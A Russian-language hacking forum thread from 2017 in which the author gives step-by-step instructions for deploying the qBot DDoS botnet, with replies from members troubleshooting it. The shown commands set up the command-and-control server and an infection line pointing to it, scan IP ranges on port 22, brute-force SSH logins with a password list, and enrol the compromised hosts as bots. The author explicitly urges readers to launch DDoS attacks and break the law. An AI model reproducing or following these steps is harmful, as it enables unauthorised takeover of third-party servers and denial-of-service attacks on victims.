Актуально Авторская статья - Установка и настройка qBot или еще один DDoS ботнет

Тема в разделе "Вирусология", создана пользователем _Ленин_, 5 сен 2017.

  1. _Ленин_

    _Ленин_

    Сообщения:
    596
    Баллы:
    16
    Нам нужно два VPS KVM сервера. RAM не меньше 1GB.
    Один для самого бота, второй для сканирования.
    Сервера должны быть на базе Centos 6.
    Так же программы PuTTY, и WinSCP.

    Подключаемся к нашему серверу по SSH.
    # yum install gcc screen python python-paramiko nano -y
    # yum install httpd -y
    # yum install wget -y
    # yum update -y
    Качаем архив - https://yadi.sk/d/ZCeiYbQ83MdQZr
    В нем три файла, их с помощью WinSCP нужно загрузить на сервер, в root директорию.
    Редактируем файл client.c
    https://image.prntscr.com/image/GYlaJKU7RWiSd8tbHp3vwg.png

    В строке char *infectline = меняем все IP на IP нашего сервера. Сохраняем и закрываем.

    # gcc server.c -o server -pthread
    # screen ./server 23 1000 777
    https://image.prntscr.com/image/o5KInWghR2eyjs-zO1cbuA.png
    Должны увидеть такое окно если всё правильно. Закрываем его CTRL+A+D
    # python cc7.py client.c 217.23.138.22 ( пишем свой IP, своего сервера )
    После этой команды начнется установка всех необходимых библиотек. Идем делать чай.
    По окончанию должны увидеть
    https://image.prntscr.com/image/PSv7JkijR8iVGYzHwOVqaQ.png
    Зеленый текст, начиная с "cd /tmp " копируем и сохраняем куда нибудь.
    Теперь нужно создать файл login.txt
    Создаем через WinSCP, легче будет. Создавать нужно в директории root, там где и все остальные файлы бота.
    https://image.prntscr.com/image/ffUGqCp_RRqsPlIJuYPqLg.png
    vlmi - логин для доступа в панельку бота.
    - пароль для доступа в панельку бота.
    Меняем на свое. Сохраняем, и закрываем. (для тех кто не понял, это файл login.txt, который мы только что создали.)
    Если потом захотите поменять, открываем файл, и таким же способом меняем.
    # ulimit -n 999999
    # service iptables stop
    # service httpd restart
    Готово, бот настроен и готов для работы.
    Открываем новую сессию PuTTY
    https://image.prntscr.com/image/9q1W-5zQSse3RbVTWeC2Pg.png
    Open.
    Вводим пароль и логин который указали в файле login.txt
    https://image.prntscr.com/image/SdzVMjKAReegVI9GxYVTfg.png
    Вводим команду #HELP и там будут все доступные виды атак. Всё просто, поймете без меня.

    Теперь нужно добавить ботов.
    Качаем данный архив - https://yadi.sk/d/uwrr10OJ3Mdh9i
    Пароль
    Напомню что для сканирования нужен второй сервер, если делать на том котором стоит ботнет, боты просто не будут добавляться. Сервер на Centos 6, как и тот на котором бот.
    Ну что, погнали.
    Первым делом папку LRAB загружаем на сервер и редактируем файл cli.pl
    https://image.prntscr.com/image/rQCiWdRkQxKseOF6nFmTBw.png
    Сюда нужно вставить ту зеленую строку, которую мы выше получили, когда ставили ботнет.
    Сохраняем, и закрываем.
    # cd LRAB
    # ./class 22 -i eth0 -a 45.50 -s 10
    22 порт, 45.50 IP диапазон, 10 скорость.
    Порт не меняем, диапазон можете менять, скорость выше 10 не ставим.
    Это команда насканирует нам IP, которые потом будем брутить.
    Сканирует быстро довольно. Подождем пока соберет примерно 400 000 - 600 000 IP и можем остановить. CTRL+C
    # cat bios.txt | sort | uniq > mfu.txt ( все уникальные IP перекинет на нам нужный файл )
    # screen
    # ./update 1500 (запускает брут) если у вас VPS с 1GB RAM, тогда ставьте 700 вместо 1500.
    Процесс брута
    https://image.prntscr.com/image/GRpytxDbRgKUzquUIaR5Cg.png
    После того как набрутите ботов
    # perl cli.pl vuln.txt
    https://image.prntscr.com/image/mZKOUUvOTkCGL4hEVqS0NQ.png
    Это хорошие боты, которые будут добавляться к вашему ботнету.
    Тут у вас скорей всего будут возникать ошибки, кидайте в тему код, и я помогу вам.
    После каждого скана, брута, добавления к боту, нужно очистить файлы bios.txt, mfu.txt, vuln.txt чтобы не теребонькать одних и тех же IP.
    В папке LRAB так же есть файл pass_file. Можете его редактировать, добавлять свои логины и пароли.
    P.S статья написана чтобы вы это делали, занимались бы DDoS атаками. Это не ознакомление, это призыв к действию. Советую использовать софт, и нарушать закон.
  2. RubliFalsh

    RubliFalsh VIP Внесен депозит 2000$ Проверенный продавец

    Сообщения:
    897
    Баллы:
    18
    Ну что сказать, хоть ты мне и не нравишься, но тут лойс ты заслужил.
    Однако лучше было бы, если ты расписал все новичкам подробнее, без абривеатур. Им познавательнее будет, тебе приятнее, за то что твои темы читают, так еще и учат.
  3. _Ленин_

    _Ленин_

    Сообщения:
    596
    Баллы:
    16
    Это статья уже более для людей которые что то понимают, да. Чисто для новичков -
    Там я подробней описал. Суть у этих ботов почти одинаковая.
    Да и на любые проблемы, которые у них возникнут, я отвечу, и помогу.
    В планах есть написать что то чисто для новичков, просто и понятно. Так что скоро будет.
  4. Vultur

    Vultur RICH-BOSS Команда форума Модератор форума Внесен депозит 500$

    Сообщения:
    792
    Баллы:
    18
    Да, самый прямой. Либо по сути говори, либо лучше промолчи.

  5. 0-day

    0-day

    Сообщения:
    172
    Баллы:
    16
    Можно ли сканировать с помощью Zmap? А потом все ip просто в файл перекинуть?
    P.S. Первые три скрина нормальные, после битые)
    P.S.S. Бро, обожаю тебя и твои мануалы) И за ответы)
  6. _Ленин_

    _Ленин_

    Сообщения:
    596
    Баллы:
    16
    Да, можно и с zmap.
  7. 0-day

    0-day

    Сообщения:
    172
    Баллы:
    16
  8. _Ленин_

    _Ленин_

    Сообщения:
    596
    Баллы:
    16
    Права измени. 777 поставь.
  9. TRDD

    TRDD

    Сообщения:
    423
    Баллы:
    16
    Изучаю тему.
    Если кто-то тестирует - отпишитесь в личные сообщения, есть пару идей на реализацию.
  10. 0-day

    0-day

    Сообщения:
    172
    Баллы:
    16
    [​IMG] *Не с кем не делись этим дерьмом*? WTF!? Это что? Пасхалка?
  11. 0-day

    0-day

    Сообщения:
    172
    Баллы:
    16
    Так и должно быть. Это пасхалка от автора.
    P.S. Я просто забыл импортировать в mfu.txt , поэтому у меня нечего не происходило.
  12. 0-day

    0-day

    Сообщения:
    172
    Баллы:
    16
    [​IMG] Вот такая ошибка.
  13. _Ленин_

    _Ленин_

    Сообщения:
    596
    Баллы:
    16
    Net::SSH2 установить нужно.
  14. 0-day

    0-day

    Сообщения:
    172
    Баллы:
    16
    Да, уже понял. Забыл отписаться. Сейчас решаю проблему с SFTP. По директориям лазить могу, а вот закачать не могу. Увы.

Поделиться этой страницей

Top